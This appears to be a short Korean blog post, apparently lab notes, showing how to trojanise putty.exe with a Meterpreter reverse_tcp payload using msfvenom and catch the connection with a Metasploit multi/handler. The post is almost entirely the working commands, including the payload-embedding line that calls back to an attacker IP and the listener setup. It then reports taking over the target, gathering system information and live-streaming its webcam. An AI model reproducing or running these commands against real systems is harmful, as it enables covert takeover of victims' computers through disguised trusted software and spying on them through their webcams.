반응형
악성코드를 심을 대상인 putty.exe 64비트를 다운 받았다.
악성코드 주입 명령어
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.60.137 lport=7777 -x putty.exe -k -f exe -o meterpreter_putty.exe
msfconsole을 실행한다.
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 공격자 IP
set lport 열고싶은 포트
exploit
악성코드를 실행하니 공격자가 대상 컴퓨터를 장악하였다.
sysinfo 명령어로 대상 컴퓨터에 대한 정보를 알아내었다.
webcam_stream 명령어로 대상 컴퓨터의 웹캠을 실시간으로 스트리밍 가능하다.
참고 사이트
반응형
'기타...' 카테고리의 다른 글
해킹 tool 사이트 (0) | 2023.03.22 |
---|